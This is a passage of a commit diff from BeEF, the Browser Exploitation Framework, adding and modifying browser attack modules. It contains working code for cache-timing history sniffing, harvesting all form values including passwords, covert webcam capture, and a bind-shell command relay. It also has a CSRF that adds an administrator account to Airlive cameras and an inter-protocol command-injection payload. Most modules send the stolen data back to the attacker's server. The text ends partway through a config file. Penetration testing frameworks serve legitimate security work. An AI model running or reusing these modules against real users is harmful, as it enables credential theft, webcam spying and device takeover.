delete img;
if (window.stop !== undefined)
window.stop();
else
document.execCommand("Stop",false);
window.removeEventListener("message", messageCB, false);
cbWrap(false);
} else {
window.postMessage('','*');
}
};
window.addEventListener("message", messageCB, false);
window.postMessage('','*');
};
cbWrap = function (value) {cb(value);};
window.addEventListener("message", runtest, false);
window.postMessage('','*');
}
};
function visipisiCB(vp, endCB, sites, urls, site, result){
if(result === null){
vp_result[site] = 'Whoops';
}
else{
vp_result[site] = result ? 'visited' : 'not visited';
}
var next_site = sites.pop();
if(next_site)
vp( urls[next_site], function (result) {
visipisiCB(vp, endCB, sites, urls, next_site, result);
});
else
endCB();
}
function getVisitedDomains(){
var tests = {
facebook: 'https://s-static.ak.facebook.com/rsrc.php/v1/yJ/r/vOykDL15P0R.png',
twitter: 'https://twitter.com/images/spinner.gif',
digg: 'http://cdn2.diggstatic.com/img/sprites/global.5b25823e.png',
reddit: 'http://www.redditstatic.com/sprite-reddit.pZL22qP4ous.png',
hn: 'http://ycombinator.com/images/y18.gif',
stumbleupon: 'http://cdn.stumble-upon.com/i/bg/logo_su.png',
wired: 'http://www.wired.com/images/home/wired_logo.gif',
xkcd: 'http://imgs.xkcd.com/s/9be30a7.png',
linkedin: 'http://static01.linkedin.com/scds/common/u/img/sprite/sprite_global_v6.png',
slashdot: 'http://a.fsdn.com/sd/logo_w_l.png',
myspace: 'http://cms.myspacecdn.com/cms/x/11/47/title-WhatsHotWhite.jpg',
engadget: 'http://www.blogsmithmedia.com/www.engadget.com/media/engadget_logo.png',
lastfm: 'http://cdn.lst.fm/flatness/anonhome/1/anon-sprite.png',
pandora: 'http://www.pandora.com/img/logo.png',
youtube: 'http://s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif',
yahoo: 'http://l.yimg.com/ao/i/mp/properties/frontpage/01/img/aufrontpage-sprite.s1740.gif',
google: 'https://www.google.com/intl/en_com/images/srpr/logo3w.png',
hotmail: 'https://secure.shared.live.com/~Live.SiteContent.ID/~16.2.8/~/~/~/~/images/iconmap.png',
cnn: 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/intl/hdr-globe-central.gif',
bbc: 'http://static.bbc.co.uk/frameworks/barlesque/1.21.2/desktop/3/img/blocks/light.png',
reuters: 'http://www.reuters.com/resources_v2/images/masthead-logo.gif',
wikipedia: 'http://upload.wikimedia.org/wikipedia/en/b/bc/Wiki.png',
amazon: 'http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-22._V183711641_.png',
ebay: 'http://p.ebaystatic.com/aw/pics/au/logos/logoEbay_x45.gif',
newegg: 'http://images10.newegg.com/WebResource/Themes/2005/Nest/neLogo.png',
bestbuy: 'http://images.bestbuy.com/BestBuy_US/en_US/images/global/header/hdr_logo.gif',
walmart: 'http://i2.walmartimages.com/i/header_wide/walmart_logo_214x54.gif',
perfectgirls: 'http://www.perfectgirls.net/img/logoPG_02.jpg',
abebooks: 'http://www.abebooks.com/images/HeaderFooter/siteRevamp/AbeBooks-logo.gif',
msy: 'http://msy.com.au/images/MSYLogo-long.gif',
techbuy: 'http://www.techbuy.com.au/themes/default/images/tblogo.jpg',
borders: 'http://www.borders.com.au/images/ui/logo-site-footer.gif',
mozilla: 'http://www.mozilla.org/images/template/screen/logo_footer.png',
anandtech: 'http://www.anandtech.com/content/images/globals/header_logo.png',
tomshardware: 'http://m.bestofmedia.com/i/tomshardware/v3/logo_th.png',
shopbot: 'http://i.shopbot.com.au/s/i/logo/en_AU/shopbot.gif',
staticice: 'http://staticice.com.au/images/banner.jpg',
};
var sites = [];
for (var k in tests)
sites.push(k);
sites.reverse();
vp = visipisi.webkit;
var first_site = sites.pop();
var end = function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+prepResult(vp_result));
}
vp(tests[first_site], function(result) {
visipisiCB(vp, end, sites, tests, first_site, result);
});
}
function prepResult(results){
var result_str ='<br>';
for(r in results){
result_str += r + ':' + results[r]+'<br>';
}
return result_str;
}
beef.execute(function() { beef.execute(function() {
if(beef.browser.isC() == 1){
getVisitedDomains();
} else {
urls = undefined; urls = undefined;
exec_next = null; exec_next = null;
start_stuff(); start_stuff();
}
}); });

2
modules/browser/get_visited_domains/config.yaml
View File

@@ -10,7 +10,7 @@ beef:
category: "Browser" category: "Browser"
name: "Get Visited Domains" name: "Get Visited Domains"
description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done by Michal Zalewski at http://lcamtuf.coredump.cx/cachetime/" description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done by Michal Zalewski at http://lcamtuf.coredump.cx/cachetime/"
authors: ["@keith55", "quentin"] authors: ["@keith55", "oxplot", "quentin"]
target: target:
working: ["FF", "IE", "O"] working: ["FF", "IE", "O"]
not_working: ["C", "S"] not_working: ["C", "S"]

2
modules/browser/hooked_domain/deface_web_page_component/config.yaml
View File

@@ -10,6 +10,6 @@ beef:
category: ["Browser", "Hooked Domain"] category: ["Browser", "Hooked Domain"]
name: "Replace Component (Deface)" name: "Replace Component (Deface)"
description: "Overwrite a particular component of the hooked page." description: "Overwrite a particular component of the hooked page."
authors: ["antisnatchor","xntrik"] authors: ["antisnatchor", "xntrik"]
target: target:
user_notify: ['ALL'] user_notify: ['ALL']

28
modules/browser/hooked_domain/get_form_values/command.js Normal file
View File

@@ -0,0 +1,28 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var form_data = new Array();
// loop through all forms
for (var f=0; f < document.forms.length; f++) {
// store type,name,value for all input fields
for (var i=0; i < document.forms[f].elements.length; i++) {
form_data.push(new Array(document.forms[f].elements[i].type, document.forms[f].elements[i].name, document.forms[f].elements[i].value));
}
}
// return form data
if (form_data.length) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+JSON.stringify(form_data));
// return if no input fields were found
} else {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Could not find any forms on '+window.location);
}
});

8
modules/exploits/zenoss_daemon_csrf/config.yaml → modules/browser/hooked_domain/get_form_values/config.yaml
View File

@@ -5,11 +5,11 @@
# #
beef: beef:
module: module:
zenoss_daemon_csrf: get_form_values:
enable: true enable: true
category: "Exploits" category: ["Browser", "Hooked Domain"]
name: "Zenoss 3.x Daemon CSRF" name: "Get Form Values"
description: "Attempts to start/stop/restart daemons on a Zenoss Core 3.x server." description: "This module retrieves the name, type, and value of all input fields for all forms on the page."
authors: ["bcoles"] authors: ["bcoles"]
target: target:
working: ["ALL"] working: ["ALL"]

14
modules/browser/hooked_domain/get_form_values/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Get_form_values < BeEF::Core::Command
def post_execute
content = {}
content['form_data'] = @datastore['form_data']
save content
end
end

2
modules/browser/webcam/command.js
View File

@@ -22,7 +22,7 @@ beef.execute(function() {
//These 4 function names [noCamera(), noCamera(), pressedDisallow(), pictureCallback(picture), allPicturesTaken()] are hard coded in the swf actionscript3. Flash will invoke these functions directly. The picture for the pictureCallback function will be a base64 encoded JPG string //These 4 function names [noCamera(), noCamera(), pressedDisallow(), pictureCallback(picture), allPicturesTaken()] are hard coded in the swf actionscript3. Flash will invoke these functions directly. The picture for the pictureCallback function will be a base64 encoded JPG string
var js_functions = '<script>function noCamera() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has no camera"); }; function pressedAllow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed allow, you should get pictures soon"); }; function pressedDisallow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed disallow, you won\'t get pictures"); }; function pictureCallback(picture) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "picture="+picture); }; function allPicturesTaken(){ }'; var js_functions = '<script>function noCamera() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has no camera"); }; function pressedAllow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed allow, you should get pictures soon"); }; function pressedDisallow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed disallow, you won\'t get pictures"); }; function pictureCallback(picture) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "image="+picture); }; function allPicturesTaken(){ }';
//This function is called by swfobject, if if fails to add the flash file to the page //This function is called by swfobject, if if fails to add the flash file to the page

50
modules/browser/webcam_html5/command.js Normal file
View File

@@ -0,0 +1,50 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var vid_id = beef.dom.generateID();
var can_id = beef.dom.generateID();
var vid_el = beef.dom.createElement('video',{'id':vid_id,'style':'display:none;','autoplay':'true'});
var can_el = beef.dom.createElement('canvas',{'id':can_id,'style':'display:none;','width':'640','height':'480'});
$j('body').append(vid_el);
$j('body').append(can_el);
var ctx = can_el.getContext('2d');
var localMediaStream = null;
var cap = function() {
if (localMediaStream) {
ctx.drawImage(vid_el,0,0);
beef.net.send("<%= @command_url %>",<%= @command_id %>, 'image='+can_el.toDataURL('image/png'));
} else {
beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=something went wrong');
}
}
window.URL = window.URL || window.webkitURL;
navigator.getUserMedia = navigator.getUserMedia || navigator.webkitGetUserMedia || navigator.mozGetUserMedia || navigator.msGetUserMedia;
navigator.getUserMedia({video:true},function(stream) {
vid_el.src = window.URL.createObjectURL(stream);
localMediaStream = stream;
setTimeout(cap,2000);
}, function(err) {
beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=getUserMedia call failed');
});
});

16
modules/browser/webcam_html5/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
webcam_html5:
enable: true
category: "Browser"
name: "Webcam HTML5"
description: "This module will leverage HTML5s WebRTC to capture webcam images. Only tested in Chrome, and it will display a dialog to ask if the user wants to enable their webcam."
authors: ["xntrik"]
target:
user_notify: ["C"]
unknown: ["All"]

16
modules/browser/webcam_html5/module.rb Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
require 'base64'
class Webcam_html5 < BeEF::Core::Command
def post_execute
content = {}
content["result"] = @datastore["result"] if not @datastore["result"].nil?
content["image"] = @datastore["image"] if not @datastore["image"].nil?
save content
end
end

54
modules/browser/webcam_permission_check/cameraCheck.as Normal file
View File

@@ -0,0 +1,54 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// Source ActionScript for cameraCheck.swf
package {
import flash.display.Sprite;
import flash.external.ExternalInterface;
import flash.media.Camera;
import flash.system.Security;
import flash.system.SecurityPanel;
public class CamCheck extends Sprite {
var _cam:Camera;
public function CamCheck() {
if (Camera.isSupported) {
this._cam = Camera.getCamera();
if (!this._cam) {
//Either the camera is not available or some other error has occured
ExternalInterface.call("naPermissions");
} else if (this._cam.muted) {
//The user has not allowed access to the camera
ExternalInterface.call("noPermissions");
// Uncomment this show the privacy/security settings window
//Security.showSettings(SecurityPanel.PRIVACY);
} else {
//The user has allowed access to the camera
ExternalInterface.call("yesPermissions");
}
} else {
//Camera Not Supported
ExternalInterface.call("naPermissions");
}
}
}
}

BIN
modules/browser/webcam_permission_check/cameraCheck.swf Normal file
View File

Binary file not shown.

79
modules/browser/webcam_permission_check/command.js Normal file
View File

@@ -0,0 +1,79 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
//These 3 functions [naPermissions() The camera is not available or not supported
// yesPermissions() The user is allowing access to the camera / mic
// yesPermissions() The user has not allowed access to the camera / mic
// Flash will invoke these functions directly.
//var js_functions = '<script>function noPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has not allowed BeEF to access the camera :("); }; function yesPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has allowed BeEF to access the camera :D"); }; function naPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Camera not supported / available :/"); }; ';
//This function is called by swfobject, if if fails to add the flash file to the page
//js_functions += 'function swfobjectCallback(e) { if(e.success){beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject successfully added flash object to the victim page");}else{beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject was not able to add the swf file to the page. This could mean there was no flash plugin installed.");} };</script>';
//These functions are global so they can accessed by the cameraCheck.swf file
noPermissions = function() {
beef.net.send("<%= @command_url %>",<%= @command_id %>,"result=The user has not allowed BeEF to access the camera :(");
}
yesPermissions = function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has allowed BeEF to access the camera :D");
}
naPermissions = function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Camera not supported / available :/&unmount=true");
}
//After the swfobject loads the SWF file, this callback sends a status back to BeEF
var swfobjectCallback = function(e) {
if(e.success){
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject successfully added flash object to the victim page");
} else {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject was not able to add the swf file to the page. This could mean there was no flash plugin installed.");
}
}
//This is the DIV for the flash object
var body_flash_container = '<div id="main" style="position:absolute;top:150px;left:80px;width:1px;height:1px;opacity:0.8;"></div>';
$j('body').append(body_flash_container);
// Lets execute swfobject.js
// If it works, we then run it to embed the swf file into the above div
$j.getScript(beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/swfobject.js',function(data,txtStatus,jqxhr) {
var flashvars = {};
var parameters = {};
parameters.scale = "noscale";
parameters.wmode = "opaque";
parameters.allowFullScreen = "true";
parameters.allowScriptAccess = "always";
var attributes = {};
swfobject.embedSWF(beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf', "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);
});
//A library that helps include the swf file
//var swfobject_script = '<script type="text/javascript" src="http://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
//This is the javascript that actually calls the swfobject library to include the swf file
//var include_script = '<script>var flashvars = {}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("http://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf", "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
//Add flash content
//$j('body').append(js_functions, swfobject_script, body_flash_container, include_script);
});

15
modules/browser/webcam_permission_check/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
webcam_permission_check:
enable: true
category: "Browser"
name: "Webcam Permission Check"
description: "This module will check to see if the user has allowed the BeEF domain (or all domains) to access the Camera and Mic with Flash. This module is transparent and should not be detected by the user (ie. no popup requesting permission will appear)"
authors: ["@bw_z"]
target:
working: ["All"]

19
modules/browser/webcam_permission_check/module.rb Normal file
View File

@@ -0,0 +1,19 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Webcam_permission_check < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/cameraCheck.swf', '/cameraCheck', 'swf')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/swfobject.js', '/swfobject', 'js')
end
def post_execute
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/cameraCheck.swf')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js')
end
end

4
modules/browser/webcam_permission_check/swfobject.js Normal file
View File

File diff suppressed because one or more lines are too long

17
modules/debug/test_beef_debug/command.js Normal file
View File

@@ -0,0 +1,17 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
try {
var msg = "<%= @msg.gsub(/"/, '\\"') %>";
beef.debug(msg);
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=called the beef.debug() function. Check the developer console for your debug message.');
} catch(e) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=something went wrong&error='+e.message);
}
});

16
modules/debug/test_beef_debug/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
test_beef_debug:
enable: true
category: "Debug"
name: "Test beef.debug()"
description: "Test the 'beef.debug()' function. This function wraps 'console.log()'"
authors: ["bcoles"]
target:
working: ["All"]
not_working: ["IE"]

20
modules/debug/test_beef_debug/module.rb Normal file
View File

@@ -0,0 +1,20 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Test_beef_debug < BeEF::Core::Command
def self.options
return [
{'name' => 'msg', 'description' => 'Debug Message', 'ui_label' => 'Debug Message', 'value' => "Test string for beef.debug() function", 'type' => 'textarea', 'width' => '400px', 'height' => '50px' }
]
end
def post_execute
content = {}
content['Result'] = @datastore['result']
save content
end
end

12
modules/debug/test_return_image/command.js Normal file
View File

File diff suppressed because one or more lines are too long

15
modules/debug/test_return_image/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
test_return_image:
enable: true
category: "Debug"
name: "Return Image"
description: "This module will test returning a PNG image as a base64 encoded string. The image should be rendered in the BeEF web interface."
authors: ["bcoles"]
target:
working: ["ALL"]

14
modules/debug/test_return_image/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Test_return_image < BeEF::Core::Command
def post_execute
content = {}
content['image'] = @datastore['image']
save content
end
end

19
modules/exploits/beefbind/beef_bind_shell/command.js
View File

@@ -9,6 +9,7 @@ beef.execute(function () {
var rport = '<%= @rport %>'; var rport = '<%= @rport %>';
var path = '<%= @path %>'; var path = '<%= @path %>';
var cmd = '<%= @cmd %>'; var cmd = '<%= @cmd %>';
var shellcode ='<%= @shellcode %>';
var uri = "http://" + rhost + ":" + rport + path; var uri = "http://" + rhost + ":" + rport + path;
@@ -31,15 +32,15 @@ beef.execute(function () {
xhr.onreadystatechange = function(){ xhr.onreadystatechange = function(){
if(xhr.readyState == 4){ if(xhr.readyState == 4){
var result = strip_output(xhr.responseText); var result = strip_output(xhr.responseText);
console.log("result.length: " + result.length); beef.debug("result.length: " + result.length);
if(result.length != 0){ if(result.length != 0){
console.log("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result); beef.debug("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result);
beef.net.send("<%= @command_url %>", <%= @command_id %>, result); beef.net.send("<%= @command_url %>", <%= @command_id %>, result);
counter++; counter++;
setTimeout("get_additional_cmd_results()",500); setTimeout("get_additional_cmd_results()",500);
} }
}else{ // No more command results, ready to send another command. }else{ // No more command results, ready to send another command.
console.log("get_additional_cmd_results - readyState != 4: request [" + counter + "]"); beef.debug("get_additional_cmd_results - readyState != 4: request [" + counter + "]");
} }
}; };
xhr.open("GET", uri, false); xhr.open("GET", uri, false);
@@ -51,9 +52,9 @@ beef.execute(function () {
xhr = new XMLHttpRequest(); xhr = new XMLHttpRequest();
xhr.onreadystatechange = function(){ xhr.onreadystatechange = function(){
if(xhr.readyState == 4){ if(xhr.readyState == 4){
console.log("get_prompt: Retrieved prompt"); beef.debug("get_prompt: Retrieved prompt");
var prompt = strip_output(xhr.responseText); var prompt = strip_output(xhr.responseText);
console.log(prompt); beef.debug(prompt);
beef.net.send("<%= @command_url %>", <%= @command_id %>, prompt); beef.net.send("<%= @command_url %>", <%= @command_id %>, prompt);
//send command //send command
@@ -68,12 +69,16 @@ beef.execute(function () {
xhr = new XMLHttpRequest(); xhr = new XMLHttpRequest();
xhr.onreadystatechange = function(){ xhr.onreadystatechange = function(){
var cmd_result = strip_output(xhr.responseText); var cmd_result = strip_output(xhr.responseText);
console.log(cmd_result); beef.debug(cmd_result);
beef.net.send("<%= @command_url %>", <%= @command_id %>, cmd_result); beef.net.send("<%= @command_url %>", <%= @command_id %>, cmd_result);
}; };
xhr.open("POST", uri, false); xhr.open("POST", uri, false);
xhr.setRequestHeader("Content-Type", "text/plain"); xhr.setRequestHeader("Content-Type", "text/plain");
command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?" if (shellcode == 'Linux'){
command = "cmd=" + command + "\n"; // very important only LF
}else{
command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?"
}
xhr.send(command); xhr.send(command);
setTimeout("get_additional_cmd_results()",500); setTimeout("get_additional_cmd_results()",500);
}; };

6
modules/exploits/beefbind/beef_bind_shell/module.rb
View File

@@ -10,7 +10,11 @@ class Beef_bind_shell < BeEF::Core::Command
{ 'name' => 'rhost', 'ui_label' => 'Host', 'value' => '127.0.0.1'}, { 'name' => 'rhost', 'ui_label' => 'Host', 'value' => '127.0.0.1'},
{ 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'}, { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'},
{ 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'}, { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'},
{ 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'} { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'},
{ 'name' => 'shellcode', 'type' => 'combobox', 'ui_label' => 'BeEF Bind Shellcode', 'store_type' => 'arraystore',
'store_fields' => ['shellcode'], 'store_data' => [['Windows'],['Linux']],
'valueField' => 'shellcode', 'displayField' => 'shellcode', 'mode' => 'local', 'autoWidth' => true
}
] ]
end end

10
modules/exploits/beefbind/beef_bind_staged_deploy/command.js
View File

@@ -295,7 +295,7 @@ beef.execute(function () {
// this is required only with WebKit browsers. // this is required only with WebKit browsers.
if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) { if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary."); beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
XMLHttpRequest.prototype.sendAsBinary = function(datastr) { XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
function byteValue(x) { function byteValue(x) {
return x.charCodeAt(0) & 0xff; return x.charCodeAt(0) & 0xff;
@@ -310,7 +310,7 @@ beef.execute(function () {
log("send_stager: stager sent."); log("send_stager: stager sent.");
stager_successfull = true; stager_successfull = true;
}catch(exception){ }catch(exception){
console.log("!!! Exception: " + exception); beef.debug("!!! Exception: " + exception);
// Check for PortBanning exceptions: // Check for PortBanning exceptions:
//NS_ERROR_PORT_ACCESS_NOT_ALLOWED: Establishing a connection to an unsafe or otherwise banned port was prohibited //NS_ERROR_PORT_ACCESS_NOT_ALLOWED: Establishing a connection to an unsafe or otherwise banned port was prohibited
if(exception.toString().indexOf('NS_ERROR_PORT_ACCESS_NOT_ALLOWED') != -1){ if(exception.toString().indexOf('NS_ERROR_PORT_ACCESS_NOT_ALLOWED') != -1){
@@ -335,13 +335,13 @@ beef.execute(function () {
var uri = "http://" + rhost + ":" + rport + path; var uri = "http://" + rhost + ":" + rport + path;
xhr = new XMLHttpRequest(); xhr = new XMLHttpRequest();
console.log("uri: " + uri); beef.debug("uri: " + uri);
xhr.open("POST", uri, true); xhr.open("POST", uri, true);
xhr.setRequestHeader("Content-Type", "text/plain"); xhr.setRequestHeader("Content-Type", "text/plain");
// this is required only with WebKit browsers. // this is required only with WebKit browsers.
if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) { if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary."); beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
XMLHttpRequest.prototype.sendAsBinary = function(datastr) { XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
function byteValue(x) { function byteValue(x) {
return x.charCodeAt(0) & 0xff; return x.charCodeAt(0) & 0xff;
@@ -362,7 +362,7 @@ beef.execute(function () {
log = function(data){ log = function(data){
beef.net.send("<%= @command_url %>", <%= @command_id %>, data); beef.net.send("<%= @command_url %>", <%= @command_id %>, data);
console.log(data); beef.debug(data);
}; };

30
modules/exploits/camera/airlive_ip_camera_csrf/command.js Normal file
View File

@@ -0,0 +1,30 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var base = '<%= @base %>';
var path = 'cgi-bin/admin/usrgrp.cgi';
var user = '<%= @user %>';
var pass = '<%= @pass %>';
var airlive_ip_camera_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(base + path, "GET",
[{'type':'hidden', 'name':'user', 'value':user},
{'type':'hidden', 'name':'pwd', 'value':pass},
{'type':'hidden', 'name':'grp', 'value':'administrator'},
{'type':'hidden', 'name':'sgrp', 'value':'ptz'},
{'type':'hidden', 'name':'action', 'value':'add'},
{'type':'hidden', 'name':'redirect', 'value':''}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(airlive_ip_camera_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", 15000);
});

18
modules/exploits/camera/airlive_ip_camera_csrf/config.yaml Normal file
View File

@@ -0,0 +1,18 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# For more information see:
# http://www.exploit-db.com/exploits/26174/
##
beef:
module:
airlive_add_user_csrf:
enable: true
category: ["Exploits", "Camera"]
name: "Airlive Add User CSRF"
description: "Attempts to add an admin user on a Airlive camera.<br/><br/>This CSRF is reported to work on the following models: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD.</br/><br/>Note: This module has not been tested on a real device."
authors: ["bcoles", "Eliezer Varadé Lopez", "Javier Repiso Sánchez", "Jonás Ropero Castillo"]
target:
unknown: ["ALL"]

20
modules/exploits/camera/airlive_ip_camera_csrf/module.rb Normal file
View File

@@ -0,0 +1,20 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Airlive_add_user_csrf < BeEF::Core::Command
def self.options
return [
{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/'},
{'name' => 'user', 'ui_label' => 'Desired username', 'value' => 'beef'},
{'name' => 'pass', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

43
modules/exploits/extract_cmd_exec/command.js Normal file
View File

@@ -0,0 +1,43 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var timeout = '<%= @timeout %>';
// validate payload
try {
var cmd = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
var payload = 'createuser '+cmd+'&>/dev/null; echo;\r\nquit\r\n';
} catch(e) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
return;
}
// validate target details
if (!rport || !rhost || isNaN(rport)) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
return;
}
if (rport > 65535 || rport < 0) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
return;
}
// send commands
var extract_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
// clean up
cleanup = function() {
document.body.removeChild(extract_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", timeout*1000);
});

16
modules/exploits/extract_cmd_exec/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
